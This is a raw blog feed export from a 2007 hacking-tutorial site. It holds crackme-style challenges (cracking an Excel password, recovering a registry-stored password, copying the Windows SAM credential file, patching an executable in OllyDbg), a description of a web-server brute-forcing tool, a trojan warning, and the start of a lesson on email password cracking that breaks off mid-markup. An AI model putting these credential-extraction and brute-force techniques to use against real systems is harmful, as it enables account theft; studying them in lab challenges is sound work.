src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6311885279603880429?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/6311885279603880429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=6311885279603880429' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6311885279603880429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6311885279603880429'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day_12.html' title='NMAP'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_tGUVOS5hsyc/Rh3e5sNYp8I/AAAAAAAAACI/ATPsII4ileU/s72-c/hacking.gif' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-90862151493634659</id><published>2007-04-11T17:30:00.000+05:30</published><updated>2007-05-14T17:03:07.723+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Test'/><title type='text'>HACKING TEST 5</title><content type='html'>Since most of the people didn't get what we were trying to do in Hacking Test 4....here is another variant of it....&lt;br /&gt;&lt;br /&gt;The process remains the same however the test file and software changes.......&lt;br /&gt;&lt;br /&gt;Download the file &lt;span style="font-weight: bold;"&gt;test5&lt;/span&gt; from following address....&lt;br /&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://www.esnips.com/doc/b7c7760f-8050-4db2-8b35-d4abbc7a5bb2/Test5"&gt;http://www.esnips.com/doc/b7c7760f-8050-4db2-8b35-d4abbc7a5bb2/Test5&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Change the file extension to &lt;span style="font-weight: bold;"&gt;.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Open it - you'll see something like this "&lt;span style="font-weight: bold;"&gt;Evaluation period out of date, purchase new version&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Next&lt;/span&gt; - Download "OllyDbg version 1.10"&lt;br /&gt;&lt;br /&gt;Read about software functions using inbuilt help menu......&lt;br /&gt;Also read the following topic "Basics of Assembler" posted on the blog........&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;&lt;span style="font-size:130%;"&gt;What is the test?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);"&gt;&lt;span style="font-weight: bold;"&gt;You have to edit the program using disassembler. After successful editing (cracking) the output of the program changes to "you really did it!! congratz!!"&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-90862151493634659?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/90862151493634659/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=90862151493634659' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/90862151493634659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/90862151493634659'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-test-5.html' title='HACKING TEST 5'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5590397121633144348</id><published>2007-04-11T17:00:00.000+05:30</published><updated>2007-05-08T18:21:37.433+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Test'/><title type='text'>HACKING TEST 4</title><content type='html'>All u need to do is just download the file &lt;span style="font-weight: bold;"&gt;TEST&lt;/span&gt; from -&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.esnips.com/doc/72e0692a-e3ea-465e-91bc-113fc8f82adb/Test"&gt;http://www.esnips.com/doc/72e0692a-e3ea-465e-91bc-113fc8f82adb/Test&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After downloading, rename it as test.exe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;What is the Test?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Tell us the password of the file. Also, you have to tell the procedure i.e. how did you break it?&lt;br /&gt;&lt;br /&gt;Send the solution to - &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;hackinme@gmail.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Hint:&lt;/span&gt; Read Lesson 9 &amp; 10.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Software Required :&lt;/span&gt; A Hex Editor.&lt;br /&gt;&lt;br /&gt;Best Of luck!!!!!!!&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);font-size:130%;" &gt;Those who are interested in further reading can contact the blog for material.......&lt;br /&gt;hackinme@gmail.com&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5590397121633144348?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5590397121633144348/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5590397121633144348' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5590397121633144348'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5590397121633144348'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-test-4-part-1.html' title='HACKING TEST 4'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-8984777684427811456</id><published>2007-04-11T16:13:00.000+05:30</published><updated>2007-05-07T14:50:43.982+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Test'/><title type='text'>HACKING TEST 3</title><content type='html'>&lt;span style="font-family:trebuchet ms;"&gt;This one is pretty simple..................&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;All you need to do is just read LESSON 8 and tell me the procedure by which you can copy the main SAM file from &lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);font-family:trebuchet ms;" &gt;c:\windows\system32\config&lt;/span&gt;&lt;span style="font-family:trebuchet ms;"&gt; folder.......&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Just write down the procedure and send it to hackinme@gmail.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Whoever will tell the procedure will move to the next level of the test.....&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;BEST OF LUCK!!!&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-8984777684427811456?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/8984777684427811456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=8984777684427811456' title='24 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8984777684427811456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8984777684427811456'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-test-3-part-1.html' title='HACKING TEST 3'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>24</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-8178237228400879630</id><published>2007-04-11T00:05:00.000+05:30</published><updated>2007-05-07T15:02:22.641+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Test'/><title type='text'>HACKING TEST 2</title><content type='html'>Check your skills on Chapter Five &amp; Six---------&lt;br /&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;font-size:14;color:red;"   &gt;&lt;br /&gt;Make sure you perform every step with caution; a single mistake can crash your system.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:blue;"  &gt;Steps:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;You have to download a file named “gatekeeper.rar” from the following site-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family:Arial;"&gt;&lt;a href="http://www.esnips.com/doc/331bd453-a377-4154-82ae-f8c5313e0074/gatekeeper"&gt;http://www.esnips.com/doc/331bd453-a377-4154-82ae-f8c5313e0074/gatekeeper&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;It’s a .rar file so first extract it……….you will see a file gatekeeper.exe in the folder, when you click on it, it will ask whether you accept the terms and condition……once you accept the terms and condition it will ask you to enter a password (two times).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;Y&lt;/o:p&gt;ou have to enter the following password – &lt;b style=""&gt;hacking&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Once the password is entered, the software is ready to use……now you can lock any folder in your system………………….&lt;/span&gt;&lt;b style=""&gt;&lt;span style=";font-family:Arial;font-size:14;color:red;"   &gt;DONT DO IT&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;……since this software was made years ago so it will not work on Windows XP (will only work on windows 98 and earlier version).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify; font-weight: bold; color: rgb(51, 51, 255);"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-family:Arial;"&gt;What is the test?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:Arial;"&gt;Now you have to search the registry for this software, find it and recover the password in binary form (as this is the form in which it is stored in the registry). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;          &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Once you have the password you have to send it to &lt;a href="mailto:blogshu@gmail.com"&gt;hackinme@gmail.com&lt;/a&gt;&lt;o:p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style=";font-family:Arial;color:red;"  &gt;Reward&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-family:Arial;"&gt;: Whoever will crack the password without any further clue will get a cool software.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-8178237228400879630?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/8178237228400879630/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=8178237228400879630' title='35 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8178237228400879630'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/8178237228400879630'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-test-2.html' title='HACKING TEST 2'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>35</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-832283997691607608</id><published>2007-04-10T21:34:00.000+05:30</published><updated>2007-05-07T15:02:03.239+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Test'/><title type='text'>HACKING TEST 1</title><content type='html'>&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;Test your skills on LESSON 1.&lt;/span&gt;......&lt;br /&gt;&lt;br /&gt;For all those who have read lesson 1....here's a simple way to check how much they understood.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Process-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1).You have to download an excel file (Named - Test) from the following site-&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.esnips.com/doc/18dd13cd-8d4e-48e9-b7e6-4b1d15105601/TEST"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;http://www.esnips.com/doc/18dd13cd-8d4e-48e9-b7e6-4b1d15105601/TEST&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2).The file is password protected and to make it a little bit difficult i have set an alphanumeric password.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3).What is required?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;-You have to find an excel file password cracker on the net.&lt;br /&gt;-Crack the password.&lt;br /&gt;-Send it to &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;hackinme@gmail.com&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;4).Since it would be difficult for a new learner to find the full version of the software, i have set the password length which can be cracked by a demo version of any password cracker.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;REWARD-&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;Who ever will crack the password will get to learn the way to crack any length password of any type.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;Your time starts now.................&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;...&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/Rh0KecNYp7I/AAAAAAAAACA/UCzS7g70gww/s1600-h/stopwatch.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 109px; height: 106px;" src="http://1.bp.blogspot.com/_tGUVOS5hsyc/Rh0KecNYp7I/AAAAAAAAACA/UCzS7g70gww/s200/stopwatch.jpg" alt="" id="BLOGGER_PHOTO_ID_5052205875064252338" border="0" /&gt;&lt;/a&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-832283997691607608?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/832283997691607608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=832283997691607608' title='29 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/832283997691607608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/832283997691607608'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-test.html' title='HACKING TEST 1'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tGUVOS5hsyc/Rh0KecNYp7I/AAAAAAAAACA/UCzS7g70gww/s72-c/stopwatch.jpg' height='72' width='72'/><thr:total>29</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-2170718687493722205</id><published>2007-04-10T00:35:00.000+05:30</published><updated>2007-04-26T15:18:20.998+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>OBIWAN - WEB SERVER BRUTE FORCING</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/RhqPrD2C9rI/AAAAAAAAABw/wfsUxHPRG7A/s1600-h/matrix_fall_3d_3_grd.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 168px; height: 126px;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/RhqPrD2C9rI/AAAAAAAAABw/wfsUxHPRG7A/s200/matrix_fall_3d_3_grd.jpg" alt="" id="BLOGGER_PHOTO_ID_5051507901978572466" border="0" /&gt;&lt;/a&gt;&lt;h3 class="entrytitle" id="post-480"&gt;    &lt;/h3&gt;&lt;p style="text-align: justify;"&gt;ObiWan  is written to check Webserver. The idea behind this is: Webserver with simple challenge-response authentication mechanism mostly have no switches to set up intruder lockout or delay timings for wrong passwords. In fact this is the point to start from. Every user with a HTTP connection to a host with basic authentication can try username-password combinations as long as he/she like it.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2170718687493722205?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2170718687493722205/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2170718687493722205' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2170718687493722205'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2170718687493722205'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/tool-of-day.html' title='OBIWAN - WEB SERVER BRUTE FORCING'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tGUVOS5hsyc/RhqPrD2C9rI/AAAAAAAAABw/wfsUxHPRG7A/s72-c/matrix_fall_3d_3_grd.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5569472890512737890</id><published>2007-04-08T01:03:00.000+05:30</published><updated>2007-04-26T15:18:32.961+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tool of the day'/><title type='text'>MESSENGER PASSWORD CRACKER GOES PUBLIC</title><content type='html'>&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; font-style: italic; color: rgb(51, 51, 255);"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tGUVOS5hsyc/Rhn8ej2C9jI/AAAAAAAAAAw/XV9hML8Oy04/s1600-h/trojan-virus.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 133px; height: 113px;" src="http://4.bp.blogspot.com/_tGUVOS5hsyc/Rhn8ej2C9jI/AAAAAAAAAAw/XV9hML8Oy04/s200/trojan-virus.jpg" alt="" id="BLOGGER_PHOTO_ID_5051346059020924466" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;This Trojan targets MSN's user and the hacking is done in real time i.e. face to face - i mean while you are chatting with someone on a messenger. This Trojan has been made public by “Our Godfather” - just a name - on the Bit Torrent network. And the worst part is that hundreds of people have already installed it.&lt;/div&gt;&lt;div class="entrybody"&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;p style="text-align: justify;"&gt;So from now onwards be a little bit more careful while chatting with an unknown person on messenger.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold; color: rgb(204, 0, 0);"&gt;YOU too CAN Become a VICTIM OF TROJAN.......&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;         &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5569472890512737890?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5569472890512737890/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5569472890512737890' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5569472890512737890'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5569472890512737890'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/messenger-password-cracker-goes-public.html' title='MESSENGER PASSWORD CRACKER GOES PUBLIC'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_tGUVOS5hsyc/Rhn8ej2C9jI/AAAAAAAAAAw/XV9hML8Oy04/s72-c/trojan-virus.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-4355904487314141802</id><published>2007-04-07T14:11:00.000+05:30</published><updated>2007-05-06T21:55:38.298+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Password Cracking'/><title type='text'>TRUTH BEHIND EMAIL PASSWORD HACKING (Lesson 7)</title><content type='html'>&lt;p style="text-align: justify;" class="MsoNormal"&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style=""&gt;  &lt;/p&gt;&lt;p class="MsoNormal" style="text-align: justify;"&gt;The basic reason behind writing this article is to make a new comer in this field aware of certain facts and lies.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;The very favourite question of every novice – &lt;b style=""&gt;“How can I hack password of Yahoo, Hotmail, Gmail, etc” &lt;/b&gt;or should I say that this is the question why most people choose hacking as a hobby? &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;What’s a general perception about email password hacking?&lt;/span&gt;&lt;/span&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;I have a username now I want to hack his/her password. What I need is a software in which I feed / input the username and the software will take care of the rest (i.e. checking different permutation and combination of passwords – BRUTE FORCE ATTACK) and give me the right password as an output. &lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="color:red;"&gt;&lt;span style="font-size:130%;"&gt;Great!!!!!!!! Such software exists in an IDEAL world, not REAL.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Dear Friends, have you ever gave this fact a thought that when you enter a wrong password three consecutive times you are asked to input the letters shown in a picture, and if you again input the wrong password a certain number of times then the account is closed temporarily for about half hour.&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;So forget about the software which can check for different permutations and combinations because it has to perform certain extra steps mentioned in the above paragraph, which are very hard (almost impossible) to implement.&lt;br /&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;b style=""&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;So does it mean that it’s impossible to crack an email account password?&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;Well I’d say &lt;b style=""&gt;impossible&lt;/b&gt; is an inappropriate word in the above statement, because in hacking &lt;b style=""&gt;nothing is impossible&lt;/b&gt; because &lt;b style=""&gt;nothing is perfect.&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);font-size:130%;" &gt;&lt;u&gt;TRUTH&lt;/u&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b 